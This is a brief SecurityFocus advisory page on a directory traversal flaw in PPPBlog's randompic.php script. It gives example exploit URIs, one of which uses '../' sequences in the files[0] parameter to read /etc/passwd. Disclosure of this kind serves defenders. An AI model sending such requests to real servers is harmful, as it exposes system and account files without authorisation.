PPPBlog Randompic.PHP Directory Traversal Vulnerability

This vulnerability may be exploited via a browser.

The following exploit and example URIs are available:

http://www.example.com/randompic.php?files[0]=../../../../../../../../../../etc/passwd
http://www.example.com/randompic.php?files[0]=[file]


 

Privacy Statement
Copyright 2010, SecurityFocus